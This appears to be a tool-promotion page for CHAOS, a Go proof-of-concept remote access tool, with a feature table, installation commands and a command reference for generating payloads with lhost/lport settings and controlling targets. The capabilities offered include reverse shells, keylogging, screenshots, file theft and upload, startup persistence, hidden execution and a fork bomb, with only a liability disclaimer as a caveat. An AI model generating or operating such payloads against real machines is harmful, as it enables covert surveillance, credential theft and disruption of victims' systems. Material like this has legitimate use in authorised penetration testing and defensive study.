SHARE
Chaos

CHAOS is a PoC that allow generate payloads and control remote operating systems.

Features

FeatureWindowsMacLinux
Reverse ShellXXX
Download FileXXX
Upload FileXXX
ScreenshotXXX
KeyloggerX
PersistenceX
Open URLXXX
Get OS InfoXXX
Fork BombXXX
Run HiddenX

Also Read – Osmedeus : Fully Automated Offensive Security Tool for Reconnaissance & Vulnerability Scanning

How to Install

Install dependencies
$ sudo apt install golang git -y

Get this repository
$ go get github.com/tiagorlampert/CHAOS

Get external golang dependencies (ARE REQUIRED GET ALL DEPENDENCIES)
$ go get github.com/kbinani/screenshot
$ go get github.com/lxn/win
$ go get github.com/matishsiao/goInfo
$ go get golang.org/x/sys/windows

Maybe you will see the message “package github.com/lxn/win: build constraints exclude all Go files”.

It’s occurs because the libraries are to windows systems, but it necessary to build the payload.

Go into the repository
$ cd ~/go/src/github.com/tiagorlampert/CHAOS

Run
$ go run main.go

How to Use?

CommandOn HOST does…
generateGenerate a payload (e.g. generate lhost=192.168.0.100 lport=8080 fname=chaos --windows)
lhost=Specify a ip for connection
lport=Specify a port for connection
fname=Specify a filename to output
--windowsTarget Windows
--macosTarget Mac OS
--linuxTarget Linux
listenListen for a new connection (e.g. listen lport=8080)
serveServe files
exitQuit this program
CommandOn TARGET does…
downloadFile Download
uploadFile Upload
screenshotTake a Screenshot
keylogger_startStart Keylogger session
keylogger_showShow Keylogger session logs
persistence_enableInstall at Startup
persistence_disableRemove from Startup
getosGet OS name
lockscreenLock the OS screen
openurlOpen the URL informed
bombRun Fork Bomb
clearClear the Screen
backClose connection but keep running on target
exitClose connection and exit on target

Demo Video

Disclaimer

THIS SOFTWARE IS PROVIDED “AS IS” WITHOUT WARRANTY OF ANY KIND. YOU MAY USE THIS SOFTWARE AT YOUR OWN RISK. THE USE IS COMPLETE RESPONSIBILITY OF THE END-USER. THE DEVELOPERS ASSUME NO LIABILITY AND ARE NOT RESPONSIBLE FOR ANY MISUSE OR DAMAGE CAUSED BY THIS PROGRAM.